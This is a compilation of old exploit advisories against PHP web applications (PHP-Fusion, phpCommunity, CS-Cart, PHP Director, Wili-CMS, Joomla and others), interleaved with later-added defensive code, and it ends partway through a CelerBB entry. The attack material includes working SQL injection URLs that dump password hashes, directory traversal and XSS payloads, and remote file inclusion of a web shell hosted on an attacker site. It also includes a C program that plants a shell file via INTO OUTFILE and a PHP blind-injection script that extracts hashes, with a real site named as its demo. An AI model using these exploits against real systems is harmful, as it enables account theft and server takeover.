PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability
Author: elusiven from Poland
Contact: elusivenpl@gmail.com
Greetings: Fusi0n Group
Exploit:
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--
# milw0rm
phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities
Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application contains several vulnerabilities
that can be exploited to obtain restricted information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view the username and
password of a registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directories on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>
Fix
No fix.
# milw0rm
CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability
CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
The magic_quotes_gpc filter can be bypassed with the String.fromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Disclosure
http://[host]/[path]/wbb/index.php?page=[]
This works on versions below 3.0.8 only.
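Two defender-side checks for the dereferrer and the GET-triggered PM deletion, written as an added example rather than taken from the advisory or from WoltLab's code: a redirect-target validator that accepts only absolute http/https URLs (so a javascript: URL or a relative target is refused, and optionally only one host), and a state-change gate that requires POST plus a session token so an [img] fetch cannot delete anything. The function names, the session array layout and the sample URLs are assumptions.

```php
<?php
// Added defensive example, not WoltLab code. Function names, the
// session layout and the sample URLs are assumptions.

/**
 * Validate a user-supplied redirect target. Accepts only absolute
 * http:// or https:// URLs; parse_url() reports "javascript:alert(1)"
 * with scheme "javascript" and no host, so it is refused, as are
 * scheme-relative ("//host/x") and relative targets. When $pinHost is
 * given the URL must also point at that host, which closes the
 * open-redirect case where only local URLs are legitimate.
 */
function safe_redirect_target(string $url, ?string $pinHost = null): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if ($pinHost !== null && strcasecmp($parts['host'], $pinHost) !== 0) {
        return null;
    }
    return $url;
}

/** Issue, or reuse, the per-session anti-CSRF token. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Gate for state-changing actions such as deleting a private message.
 * The request must be a POST carrying the session token. A GET produced
 * by an <img src="..."> fetch has neither, so the fake image from the
 * advisory cannot trigger the deletion.
 */
function authorize_state_change(string $method, array $post, array $session): bool
{
    if ($method !== 'POST' || empty($post['csrf_token']) || empty($session['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Constructed sample inputs, including the two URL shapes from the advisory.
$session = [];
$token = csrf_token($session);

$urls = [
    'javascript:alert("Example");',
    'https://forum.example/wbb/index.php?page=Index',
    'https://evil.example/landing',
    '//evil.example/landing',
];
foreach ($urls as $u) {
    printf("%-50s any host: %-8s pinned: %s\n", $u,
        safe_redirect_target($u) === null ? 'REJECTED' : 'ok',
        safe_redirect_target($u, 'forum.example') === null ? 'REJECTED' : 'ok');
}

// The <img> fetch is a GET without a token; the real form is a POST with one.
printf("image-triggered GET : %s\n",
    authorize_state_change('GET', [], $session) ? 'allowed' : 'denied');
printf("token-bearing POST  : %s\n",
    authorize_state_change('POST', ['csrf_token' => $token], $session) ? 'allowed' : 'denied');
```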
# milw0rm
PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability
Discovered By d3b4g
script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
Greetz : str0ke | Inerd | & friends
Follow me on twitter www.twitter.com/schaba
About:
PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.
/* start
0x1
Proof of concept
-------------------------------------
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
/* end
From Tiny Little island of Maldives
# milw0rm
PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* Dork "Powered by PHP Director 0.2"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PHP Director 0.2.1 (sql into outfile) eval() Injection Exploit |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
{Exploit}-> index.php?cat=%27+UNION+SELECT+1,'lol',3,4,5,6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'/var/www/ex.php'/*
{PHP.ini}-> Magic Quotes off
{Written}-> by Juri Gianni aka yeat - staker[at]hotmail[dot]it
{WhereIs}-> http://sourceforge.net/projects/phpdirector/
{Compile}-> gcc -o exploit exploit.c
{Details}-> index.php (line 56-58)
56. }elseif (isset($_GET["cat"])) {
57. $cat = $_GET["cat"];
58. $_query = sprintf("SELECT SQL_CALC_FOUND_ROWS * FROM pp_files WHERE `category` = '$cat etc..)
{Bug}-> $cat variable is not checked so we have a sql injection
{Fix}-> $cat = mysql_real_escape_string($_GET['cat']);
yeat@lulz:~/Desktop$ gcc -o exploit exploit.c
yeat@lulz:~/Desktop$ ./exploit localhost /cms /var/www/shell.php
Exploit successful..shell: /var/www/shell.php
*/
#define GET "GET %s/index.php?cat=%s HTTP/1.1\r\n" \
            "Host: %s\r\n" \
            "User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
            "Connection: close\r\n\r\n"
#define Exec "'+UNION+SELECT+1,2,3,4,''" \
             ",6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'%s'"

/* Resolve a host name to its first IPv4 address in dotted form. */
char *getHost (char *host)
{
    struct hostent *hp;
    struct in_addr **y;

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf("cannot resolve host..\n");
        exit(0);
    }
    y = (struct in_addr **)hp->h_addr_list;
    return inet_ntoa(**y);
}

int main (int argc, char **argv)
{
    int server, leak;
    ssize_t got;
    char html[1024];
    char packet[500], loadsf[500];
    struct sockaddr_in addr;

    /* host, path and file are all used below, so three arguments are required */
    if (argc < 4) {
        printf("Usage: %s host path file\n", argv[0]);
        printf("RunEx: %s localhost /cms /var/www/shell.php\n", argv[0]);
        exit(0);
    }
    server = socket(AF_INET, SOCK_STREAM, 0);
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));
    leak = connect(server, (struct sockaddr *)&addr, sizeof(addr));
    if (leak < 0) {
        printf("connection refused..try again\n");
        exit(0);
    }
    /* build the query string, leaving room for the trailing "%23" */
    snprintf(loadsf, sizeof(loadsf), Exec, argv[3]);
    strncat(loadsf, "%23", sizeof(loadsf) - strlen(loadsf) - 1);
    snprintf(packet, sizeof(packet), GET, argv[2], loadsf, argv[1]);
    /* send only the request text, not the whole 500-byte buffer */
    if (send(server, packet, strlen(packet), 0) < 0) {
        printf("data sent error..\n");
    }
    while ((got = recv(server, html, sizeof(html) - 1, 0)) > 0) {
        html[got] = '\0';                 /* strstr needs a terminated string */
        if (strstr(html, "MySQL") || strstr(html, "mysql_fetch_array")) {
            printf("Exploit unsuccessful..\n");
            break;
        } else {
            printf("Exploit successful..shell: %s\n", argv[3]);
            break;
        }
    }
    close(server);
    return 0;
}
#milw0rm
Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software Site: blogsa.net
Discovered by: Onur YILMAZ aka DJR
Blog: http://www.onuryilmaz.info
E-mail: contactonuryilmazinfo
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this CMS generates site files (index.php, etc.) containing code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, an attacker can place a remote URL (if allow_url_fopen=On) or a local path into the binn_include_path variable.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
nForum 1.5 Multiple Remote SQL Injection Vulnerabilities
Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Date: 06 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allow a guest to view the username and
password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
UMI.CMS Cross-Site Scripting vulnerability
Affected Software
UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)
Product Link:
http://www.umi-cms.ru
Severity Rating
Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote
CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)
CVE: not assigned
Software Description
UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.
User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows execution of arbitrary HTML and script code in a user's browser session in the context of an affected site.
Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.
Solution
Update to version 2.7.1 (build 10856).
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
TinX CMS 3.x SQL Injection Vulnerability
Affected Software
TinX CMS
Versions 3.x prior to 3.5.1
Product Link:
http://sourceforge.net/project/showfiles.php?group_id=133415
Severity Rating
Severity: High
Impact: SQL Injection
Attack Vector: Remote
CVSS v2:
Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)
CVE: CVE-2009-0825
Software Description
TinX CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a SQL Injection vulnerability in TinX CMS.
User input passed to the "id" parameter is not properly sanitized. This allows remote attackers to execute arbitrary SQL commands via the "id" parameter.
Example:
http://[server]/system/rss.php?id=1'SQL-code
SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.
Solution
Update to version 3.5.1.
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-13
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
isiAJAX v1 (paises.php id) Remote SQL Injection Vulnerability
Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
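Added hardening example for the two query patterns whose source the page shows (isiAJAX's integer id above and PHP Director's string category), not code from either project: both values are bound as parameters instead of being interpolated into the SQL text. It runs against an in-memory SQLite database with constructed rows so it works offline; the real applications would point PDO at MySQL, and the table and column names are taken from the advisories.

```php
<?php
// Added hardening example, not isiAJAX or PHP Director code. The SQLite
// fixture below is constructed so the script runs offline; production code
// would use a MySQL DSN. Table and column names follow the advisories.

/**
 * Replacement for the paises.php lookup. The continent id is validated as
 * an integer and bound as one, so "-1 UNION SELECT 1,USER()--" is either
 * rejected up front or treated as a value, never as SQL.
 */
function countries_by_continent(PDO $db, $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $db->prepare('SELECT id, nombre FROM pais WHERE id_continente = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * Replacement for the PHP Director category query (SQL_CALC_FOUND_ROWS is
 * MySQL-only and omitted for the SQLite demo). The category is bound as a
 * string, so the quote in "' UNION SELECT ... INTO OUTFILE ..." is data.
 * Independently, the account the web app connects with should not hold the
 * MySQL FILE privilege; without it INTO OUTFILE fails even if a query is
 * ever injected.
 */
function files_by_category(PDO $db, string $cat): array
{
    $stmt = $db->prepare('SELECT * FROM pp_files WHERE category = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed fixture.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE pais (id INTEGER, nombre TEXT, id_continente INTEGER)');
$db->exec("INSERT INTO pais VALUES (1, 'Paraguay', 2), (2, 'Italia', 1)");
$db->exec('CREATE TABLE pp_files (id INTEGER, category TEXT, name TEXT)');
$db->exec("INSERT INTO pp_files VALUES (1, 'music', 'a.mp4')");
$db->exec('CREATE TABLE usuarios (id INTEGER, nombre TEXT)');   // the table the PoC reads
$db->exec("INSERT INTO usuarios VALUES (7, 'admin')");

// Payloads quoted from the advisories, now handled as data.
$attackId  = '-1 UNION SELECT 1,USER()--';
$attackCat = "' UNION SELECT 1,'lol',3 INTO OUTFILE '/var/www/ex.php'/*";

try {
    countries_by_continent($db, $attackId);
} catch (InvalidArgumentException $e) {
    echo "id rejected: {$e->getMessage()}\n";
}
echo "legitimate id=2:\n";
print_r(countries_by_continent($db, '2'));
echo "injected category:\n";
print_r(files_by_category($db, $attackCat));
```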
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities
Application: Wili-CMS
Version: 0.4.0
Website: http://wili-cms.sourceforge.net/
Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple Remote/Local File Inclusion
Requisites: none
File affected: index.php
This bug allows a guest to include remote and
local files and thereby to execute remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: lib/admin/init_session.php
This bug allows a guest to log in as admin: uname and password are copied from $_REQUEST into the session and concatenated unescaped into the query below.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: <?php system($_GET['cmd']); ?>
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd
- [B] Authentication Bypass
<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php" method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>
Fix
No fix.
# milw0rm
Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: ... Logged as: ".$logged." (ID: ".$logged_id.") // $logged_id is the first column of the query result: with the UNION below it holds user:password
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
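The cookie check above, the Wili-CMS [B] and CelerBB [C] login queries, and the isiAJAX paises.php query all share one defect: request data is pasted into the SQL text, so the client decides what the query says. The Python script below is an added example, not code from any of these projects or advisories. It rebuilds the Blue Eye CMS cookie check against an in-memory SQLite table filled with constructed sample users, runs the two kinds of payload seen on this page against it (a comment that drops the password and key checks, as in the CelerBB admin'# form, and the UNION that puts user:password into the id column), and then shows the same check with bound parameters. The MySQL-only pieces of the original PoCs are adapted: concat(user,0x3A,password) is written as user || ':' || password, and the comment opener is the /* from the Blue Eye PoC, which SQLite also reads as a comment running to the end of the statement.

```python
import sqlite3

# Constructed sample users (not from the page), laid out like the `users` table
# the Blue Eye CMS cookie check reads: id, user, password, key.
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99", "k3y-admin"),
    (2, "bob", "9f9d51bc70ef21ca5c14f307980a29d8", "k3y-bob"),
]

# Payload 1: comment out the password and key checks (the CelerBB "admin'#"
# trick, using the /* opener from the Blue Eye PoC).
COMMENT_BYPASS = "admin'/*"
# Payload 2: the Blue Eye PoC, with concat(user,0x3A,password) rewritten as
# user || ':' || password so SQLite understands it.
UNION_LEAK = "' UNION SELECT `user` || ':' || password FROM blueeye_users WHERE id=1/*"


def make_db():
    """In-memory stand-in for the CMS database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE blueeye_users (id INTEGER, `user` TEXT, password TEXT, `key` TEXT)")
    db.executemany("INSERT INTO blueeye_users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return db


def vulnerable_cookie_login(db, c_login, c_pass, c_key):
    """Same shape as the vulnerable lines 17-24: the three cookie values are
    pasted into the SQL text, and exactly one returned row means 'logged in'.
    Returns ($logged, $logged_id) or None."""
    query = ("SELECT id FROM blueeye_users WHERE `user` = '%s' AND password = '%s' AND `key` = '%s'"
             % (c_login, c_pass, c_key))
    rows = db.execute(query).fetchall()
    if len(rows) == 1:                 # the only check the code makes
        return c_login, rows[0][0]     # $logged_id is whatever the first column holds
    return None


def fixed_cookie_login(db, c_login, c_pass, c_key):
    """Same check with bound parameters: cookie text can no longer change the query."""
    query = "SELECT id FROM blueeye_users WHERE `user` = ? AND password = ? AND `key` = ?"
    rows = db.execute(query, (c_login, c_pass, c_key)).fetchall()
    if len(rows) == 1:
        return c_login, rows[0][0]
    return None


if __name__ == "__main__":
    db = make_db()
    print("legit  :", vulnerable_cookie_login(db, "bob", SAMPLE_USERS[1][2], "k3y-bob"))
    print("bypass :", vulnerable_cookie_login(db, COMMENT_BYPASS, "", ""))
    print("leak   :", vulnerable_cookie_login(db, UNION_LEAK, "", ""))
    print("fixed  :", fixed_cookie_login(db, UNION_LEAK, "", ""))
```

Note why the PoC needs WHERE id=1: the application accepts the login only when exactly one row comes back, so a UNION returning the whole user table would be rejected, and the hash must be pulled one user at a time. With bound parameters both payloads are compared literally against the user column and match nothing.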
Joomla com_ijoomla_archive Blind SQL Injection Exploit
<?php
/*
Joomla com_ijoomla_archive Blind SQL Injection Exploit
AUTHOR : Mountassif Moad
DATE : 5 March 2009
APPLICATION : Joomla com_ijoomla_archive
DORK : inurl:"com_ijoomla_archive"
*/
ini_set("max_execution_time", 0);
print_r('
com_ijoomla_archive Blind SQL Injection Exploit
php '.$argv[0].' http://www.site.com/ real id
Demo :
php '.$argv[0].' http://thecatholicspirit.com/ 17
');
if ($argc > 1) {
    $url = $argv[1];
    if ($argc < 3) {
        $userid = 1;
    } else {
        $userid = $argv[2];
    }
    // Injection point: catid is concatenated into the archive search query
    $base = $url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid;
    // Calibrate the oracle: response length for a true and for a false condition
    $r = strlen(file_get_contents($base."+and+1=1"));
    $w = strlen(file_get_contents($base."+and+1=0"));
    $t = abs((100-($w/$r*100)));   // percent length difference between the two pages
    // Pull the 32 hex chars of the first jos_users password hash, one at a time
    for ($j = 1; $j <= 32; $j++) {
        // Inner loop reconstructed from the garbled original: step two codes at a time
        // through '0'..'9', then jump to 'a'..'f'; bounds chosen so '9' and 'a' are told apart
        for ($i = 48; $i <= 103; $i = $i+2) {
            if ($i == 58) { $i = 97; }
            $laenge = strlen(file_get_contents($base."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                // Looks like the false page: ascii(char) <= $i, so it is $i or the hex char just below it
                $laenge = strlen(file_get_contents($base."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo ($i == 97) ? chr(57) : chr($i-1);   // '9' sits right before the jump to 'a'
                } else {
                    echo chr($i);
                }
                $i = 103;   // character found: leave the inner loop
            }
        }
    }
    echo "\n";
} else {
    echo "\nExploiting failed: find another site\n";
}
?>
# milw0rm
CelerBB 0.0.2 Multiple Remote Vulnerabilities
Application: CelerBB
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authentication Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
